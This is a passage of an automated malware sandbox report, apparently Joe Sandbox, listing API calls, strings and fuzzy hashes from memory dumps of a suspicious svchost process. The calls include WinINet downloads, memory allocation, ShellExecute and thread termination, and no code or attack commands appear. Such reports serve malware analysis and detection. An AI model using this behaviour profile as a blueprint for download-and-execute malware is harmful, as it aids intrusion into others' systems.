                                                                                                                                                                                                                                                            • Part of subcall function 13152A17: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A3B
                                                                                                                                                                                                                                                            • Part of subcall function 13152A17: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A50
                                                                                                                                                                                                                                                            • Part of subcall function 13152A17: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A6B
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 13154C57
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 13154C6F
                                                                                                                                                                                                                                                          • __invoke_watson.LIBCMT ref: 13154CE2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                                                                                                                                                                                                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                                                                                                                          • API String ID: 2940365033-232180764
                                                                                                                                                                                                                                                          • Opcode ID: a830648fd4a1c629fa61de16f53efe0184e96fd83ac8a7b94d59be71d99b3b09
                                                                                                                                                                                                                                                          • Instruction ID: dfc8f3ba4fd6df9083975587692ee10c8c12e7847dc8dc8b3d2360d1c2bc46ca
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a830648fd4a1c629fa61de16f53efe0184e96fd83ac8a7b94d59be71d99b3b09
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9841D376B40315ABCF159FB48D84D9E7BA8EF4A258F2A093EF124F3150DF30A5818B61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(?,00000000,?,00000042,80000200,00000000), ref: 0400140C
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04001464
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040014A4
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 040014F3
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 04001591
                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,gzip), ref: 040015A7
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001624
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0400162E
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04001636
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 040013E2
                                                                                                                                                                                                                                                          • gzip, xrefs: 0400159B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2775645730.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$HttpInfoQueryVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                          • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                          • API String ID: 1677293161-2863726208
                                                                                                                                                                                                                                                          • Opcode ID: b6a4f67f2c04c2ae71a405f0e006c58d8ef3130077334d0a550e2d88f4764e53
                                                                                                                                                                                                                                                          • Instruction ID: 63997b83569fe5eb453668b9df76212b6a902c31a70f2980fe836ae56e0fff1a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6a4f67f2c04c2ae71a405f0e006c58d8ef3130077334d0a550e2d88f4764e53
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1711E75904218EBEB65DFA4CC48BEEB7B4BB48305F148199E509BB280DB75AEC4CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00000000,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AE79
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,,,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEAD
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,1314142C,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEB7
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEBF
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,13141428,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEC9
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AED1
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,13141424,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEDB
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen
                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                          • API String ID: 751011610-1078660327
                                                                                                                                                                                                                                                          • Opcode ID: 8d063c209c05f3c40b290d53618749aae86c4561cc527b284faf3af39faf7822
                                                                                                                                                                                                                                                          • Instruction ID: 2d473fa946dc4316309682cf5bab062bba16a4a6af7baf30bbb2f6fcee6fc67c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d063c209c05f3c40b290d53618749aae86c4561cc527b284faf3af39faf7822
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C114C36A0022EEFDF109F64ED408DB3FA5EF042A5B158036F818A6161EB31DD70DEA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569C8,0000000C,13152BC8,00000000,00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7), ref: 13152AC8
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152AFC
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B0C
                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B2E
                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 13152B36
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleIncrementInterlockedModule__lock
                                                                                                                                                                                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                          • API String ID: 3405995401-2843748187
                                                                                                                                                                                                                                                          • Opcode ID: 29c2cd3d3dea595baed148f36d95434f1a2f5eed951343c799b98d5db5c70684
                                                                                                                                                                                                                                                          • Instruction ID: bdd58697fcf6b0d5aa352136108c748b5c22594eda4f2e92f2ccc84a88215cd1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29c2cd3d3dea595baed148f36d95434f1a2f5eed951343c799b98d5db5c70684
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56114C76A007029FE711AF79D840BEABBF0AF06315F104929F8B997651DB34A902CF61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000000,00000000,1314D277,00000000,-00000008,00000000,00000000,1314DFE7,00000000,00000000,76132640,1314E1E5,00000000), ref: 13143428
                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32 ref: 13143438
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 13143449
                                                                                                                                                                                                                                                          • OpenThread.KERNEL32(00000001,00000000,00000000), ref: 13143468
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 13143476
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 1314347D
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 13143488
                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 13143498
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 131434A1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Thread$CriticalDeleteExitSection$CloseCurrentHandleOpenProcessSleepTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3126711353-0
                                                                                                                                                                                                                                                          • Opcode ID: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                                                                                          • Instruction ID: 37a31bfd6f88ac882e859ff3a5f913339fc59731e7e290309411a6c915f0fd73
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101A2B1500278AFD309BFA2DEC899A7AA9FB0535CB194939F50693204C7784845CFF2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 281148d3f13c85d1e5e5d8c5f199cb49ebcef382ed69331147877eb2d37db5b2
                                                                                                                                                                                                                                                          • Instruction ID: 347a5177cc14affda91ebe3db16af19fc9b1fd4cae495389ec6fa93fff2853fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 281148d3f13c85d1e5e5d8c5f199cb49ebcef382ed69331147877eb2d37db5b2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B841C971704316FBD7109B79CF40F6A3A5DDB817BCF784A25B821D51D4EB60E4428A61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 13155470
                                                                                                                                                                                                                                                          • __isctype_l.LIBCMT ref: 131554E3
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Locale$UpdateUpdate::___isctype_l
                                                                                                                                                                                                                                                          • String ID: $$+$-$0$0
                                                                                                                                                                                                                                                          • API String ID: 2547950892-4042548909
                                                                                                                                                                                                                                                          • Opcode ID: d2b3e845f7807b4b5b67cdf3126a2f40e6913829005909c4e3aceb6e8a7baea6
                                                                                                                                                                                                                                                          • Instruction ID: 66c86f7016eb5a35a24e8cdfd165b81e615871dcc9a799f4fb2d47fd091f4955
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2b3e845f7807b4b5b67cdf3126a2f40e6913829005909c4e3aceb6e8a7baea6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6271D17092128ACFDB11CF28C6507AE7BA6AF13355F2D0159F8B3D7190D7309A91CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountTick
                                                                                                                                                                                                                                                          • String ID: L'
                                                                                                                                                                                                                                                          • API String ID: 536389180-3089082269
                                                                                                                                                                                                                                                          • Opcode ID: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                                                                                          • Instruction ID: 5ccda6dff719294e52dc9972e018d76e162f8bde6f1a59f0aee7bd834407432f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38513075D00309FFCF10CF98C9848AEBBB9BB44364F35866AE569A7191D7309A81CF91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,1314CF74,00000000,00000000,?,1314CF73,?), ref: 13151ACD
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000002,131414AC), ref: 13151BAE
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 13151BC3
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                                                                                          • String ID: %$u
                                                                                                                                                                                                                                                          • API String ID: 1659193697-272644364
                                                                                                                                                                                                                                                          • Opcode ID: fbad5abb2e874c339c1d36cb4db215c37bc2f01017c3cd0755d4ce8c287bdbc7
                                                                                                                                                                                                                                                          • Instruction ID: 3b30c20e63476d411fe8fff1dc5f307cf6bb43daa7a15507a0be19b988553535
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbad5abb2e874c339c1d36cb4db215c37bc2f01017c3cd0755d4ce8c287bdbc7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5941C476E0024AAFDB12DF78CD849AEBBB9EF06244B194174F855E7201F734EA44CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • getSystemCP.LIBCMT ref: 131544B8
                                                                                                                                                                                                                                                            • Part of subcall function 13154425: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 13154432
                                                                                                                                                                                                                                                            • Part of subcall function 13154425: GetOEMCP.KERNEL32(00000000), ref: 1315444C
                                                                                                                                                                                                                                                          • setSBCS.LIBCMT ref: 131544CA
                                                                                                                                                                                                                                                            • Part of subcall function 13154120: _memset.LIBCMT ref: 13154133
                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030), ref: 13154510
                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,?), ref: 13154523
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 1315453B
                                                                                                                                                                                                                                                          • setSBUpLow.LIBCMT ref: 1315460E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2658552758-0
                                                                                                                                                                                                                                                          • Opcode ID: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                                                                                          • Instruction ID: 5c1de8df099469ff0dda55c5d4dbde2984e7a614063db4ef8b63bf716e2067d3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE51F531B842559BCF15CF69C5806AABBB5FF07301F19816AF8A2AF142DF38D446CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 13145048
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000003,00000000,00000000,00000000,00000003,00000000,00000000), ref: 13145068
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1314507D
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 1314508E
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000000), ref: 131450AB
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,0000000A,0000000A), ref: 131450E3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HttpInternet$OpenRequest$ConnectFileInfoQueryReadSend
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2757949531-0
                                                                                                                                                                                                                                                          • Opcode ID: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                                                                                          • Instruction ID: 3e48ee776b3adc7c9bad0b04ab65395fd94d74b2f812049d15b6b2da66a3f4e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55211A7A601228FBCB219BA5CD88DDF7EBCEF46AA4B244465F505E2540E7748A00DAF0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,13153CD0,1315290D,?,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152A24
                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(FFFFFFFF,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A3B
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A50
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A6B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                                                                                          • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                          • API String ID: 1929421221-629428536
                                                                                                                                                                                                                                                          • Opcode ID: d3e6ce9aa681a1f1d64aa8754bc4b29a2fa9782f9ebf582eeb7384410117f2df
                                                                                                                                                                                                                                                          • Instruction ID: 51f9909ef42d79873867bfb9de5710e1842ae3eaa590c20a3a01065d34695617
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3e6ce9aa681a1f1d64aa8754bc4b29a2fa9782f9ebf582eeb7384410117f2df
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF0B436A016329FD726AB34CD849EA3FE49F0765470E9430F835D2568DB34CC038AB1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,13152A15,00000000,13154BB5,00000000,00000000,00000314,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529AD
                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529C4
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D9
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 131529F4
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                                                                                          • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                          • API String ID: 1929421221-3682587211
                                                                                                                                                                                                                                                          • Opcode ID: fd7ebc49492c195ac40f35a3bcc415d9885276f82af5efdcc6ad24769fc2db4a
                                                                                                                                                                                                                                                          • Instruction ID: ee033adfa20d7b5162f0d990e6246f8c85a8aadc165d10402fe02678524f2fd1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd7ebc49492c195ac40f35a3bcc415d9885276f82af5efdcc6ad24769fc2db4a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F0B436A016739FD71AAB34CD44AEA3FE49F0265570A5135F834D2264DB34D843DBB1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                                                                                          • Instruction ID: 6fdbef346fd8525ead6d0797cac569ecc0bda0291445e6b593981b95549a5816
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21A171B1D00259AFEB01CBA4CD40BEEBFF9AF05244F384065ED51E7141E7769A45CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(1314E1E5,13141440,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE3A
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(1314E1E5,-00000004,0000008B,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE5F
                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1314DEC5
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314DECB
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 1314DEFB
                                                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(00000000,-00000004,0000008E,?,00000000,00000000), ref: 1314DF31
                                                                                                                                                                                                                                                            • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountCriticalDirectoryEnterExecuteSectionShellSystemTicklstrlenwnsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 995194965-0
                                                                                                                                                                                                                                                          • Opcode ID: d61a759d89a3b4b0c9b4c207f298292ffb13940e9cf1be3464447091ad592608
                                                                                                                                                                                                                                                          • Instruction ID: 13c1b9369066cdb6e4ed58d56a630e59443e24633ad642c3ed1b1b0e48a6ab49
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d61a759d89a3b4b0c9b4c207f298292ffb13940e9cf1be3464447091ad592608
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 587116B6A00354BFDF10DFA8CD9099E77B9EB42304F694079F445A7281DB74AA81CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000008,00000000,?,131475E5), ref: 1314F508
